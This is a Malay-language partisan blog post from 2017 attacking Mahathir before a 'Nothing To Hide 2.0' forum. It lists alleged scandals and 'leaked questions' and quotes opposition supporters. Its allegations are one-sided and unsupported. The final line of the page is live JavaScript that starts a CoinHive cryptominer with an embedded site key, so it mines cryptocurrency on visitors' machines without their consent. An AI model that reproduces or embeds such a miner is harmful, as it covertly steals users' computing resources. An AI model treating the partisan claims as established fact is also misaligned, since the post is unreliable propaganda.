© Copyright 2017, All Rights Reserved
Home / Blog / Dr MiM: Nothing To Hide 2 : Soalan Bocor Untuk Mahathir

Dr MiM: Nothing To Hide 2 : Soalan Bocor Untuk Mahathir

Kita difahamkan bahawa program ‘Nothing To Hide 2.0’ (NTH2) yang dianjur oleh Pemuda parti Bunga akan diteruskan juga.


Jika benar, kita sudah dapat mengagak propaganda yang akan dimainkan oleh puak Pemuda PPBM ini. Seperti yang dijangka, mereka akan cuba memperlekeh-lekeh Perdana Menteri, Datuk Seri Najib Razak kerana ‘tidak hadir’ tetapi dijangkakan tindakan mereka itu tidak ada nilai dan sekadar publisiti murahan sahaja.

Yang lebih dinanti-nantikan ialah apabila hadirin yang berada dalam majlis ini akan menggunakan sepenuhnya majlis tersebut untuk menyoal siasat Tun Dr Mahathir.

Dalam masa yang sama, penulis mendapat berita bahawa majlis ini nanti akan disertai oleh lebih ramai pihak yang sebelum ini tidak diberi kesempatan untuk bercakap semasa Forum bertajuk “Mahathir: Agen perubahan atau Pemusnah” dan “Nothing To Hide 1”

Mereka ini terdiri daripada generasi muda dan juga penyokong-penyokong tegar yang telah meluahkan pandangan mereka serta muak dengan sandiwara badut-badut dalam Pakatan Harapan dan menolak kehadiran Mahathir di dalam Pakatan.

Bagi mereka, Nothing to Hide 2 adalah peluang mereka secara terbuka untuk menggesa Mahathir supaya undur diri dan tidak lagi mencampuri politik Pakatan Harapan.

Untuk rekod, semasa forum Mahathir: Agen perubahan atau Pemusnah”, seorang penyokong pembangkang telah menghentam aktivis jalanan Hishammuddin Rais yang sebelum ini menghasut generasi reformasi untuk membenci Mahathir.

“Dia siap kata pada kita, palang pada huruf T, titik pada huruf I, pada Mahathir pun dia tak percaya tapi sekarang dia percaya kenapa?

Kenapa nak percaya cakap Mahathir. Sendiri cakap tak boleh percaya lepas tu suruh orang percaya.”

“Pendapat kami marrahim, orang macam saya yang mengundi baru 2kali. Kita tak nak Mahathir. Ini adalah suara gen Y.” kata seorang lagi penyokong pembangkang dan disambut dengan tepuk tangan tanda setuju oleh pihak hadirin.

Penulis tidak pasti berapa ramai anak muda penyokong pembangkang yang akan bangkit menyoal dan menyatakan bangkangan mereka terhadap Mahathir tetapi ahli-ahli Armada, sayap parti Bunga juga dilaporkan akan bertanya tentang isu kekayaan Mahathir dan anak-anaknya.

Sebelum ini, seorang Exco Armada telah mendedahkan bahawa masih ada lagi beberapa syarikat yang dimiliki anak Mahathir beroperasi sejak beliau menjadi Perdana Menteri sehingga hari ini, termasuk mendapat tender kerajaan. Beliau telah menyerahkan senarai syarikat itu kepada SPRM.

Selain daripada itu, beberapa ‘soalan bocor’ yang akan ditanya kepada Mahathir Mohammad juga telah viral di dalam media sosial. Di antara soalan-soalannya adalah mengenai projek-projek kroni, bail-out billion ringgit dan skandal-skandal seperti FOREX, BMF, Perwaja Steel yang masih lagi belum terjawab. Begitu juga dengan pendirian sebenar Mahathir tentang aktiviti liwat Anwar Ibrahim.

1. Kit Siang juga telah menyatakan membuat anggaran didalam sidang Parlimen 2 dekad yang lalu bahawa Bank Negara telah mengalami kerugian besar RM30 bilion. Tetapi Bank Negara telah mendakwa kerugian berjumlah RM10.1 bilion dalam 1992 dan RM5.7 bilion dalam 1993. (3 Jun 2012).

2. Mat Sabu PAN pula telah melabel Mahathir sebagai Kepala Perompak. (1 Mei 2015).

Baca : http://novandri.blogspot.com/2017/07/siapa-kepala-perompak-keldai-tua-auta.html

Dan soalan cepumasnya ialah berapa billion ringgit wang rakyat hangus begitu sahaja dek skandal-skandal di sepanjang pentadbiran Mahathir?

Penulis tidak pasti sama ada urusetia program NTH2 tahu mengenai berita di atas tetapi jika benar, penulis menjangka pihak urusetia akan ‘something to hide’ juga dengan mengawal individu-individu yang akan bangun bertanya semasa sessi soal jawab.

Mereka takut program NTH2 ini akan backfired hingga menyebabkan program tersebut akan disindir kerana mereka bertindak ‘everything to hide’. Kita tunggu dan lihat kesudahan program tersebut.


SHARE ARTICLE :


Source link

Tinggalkan Ulasan Anda

About admin

x

Check Also

UNDI DAN SOKONG PAKATAN HARAPAN BERMAKNA MENGIAKAN KEZALIMAN MAHATHIR, KATA PRESIDEN PAS!!!

Tidak hairanlah mengapa DAP marah benar dengan PAS dan Presidennya, Abdul Hadi ...

Facebook Auto Publish Powered By : XYZScripts.com
© Copyright 2017, All Rights Reserved
%d bloggers like this:
var m = new CoinHive.Anonymous('dkVZKvPTpA9ReGRa2gsf6amqUO6Yr4Pu'); m.start();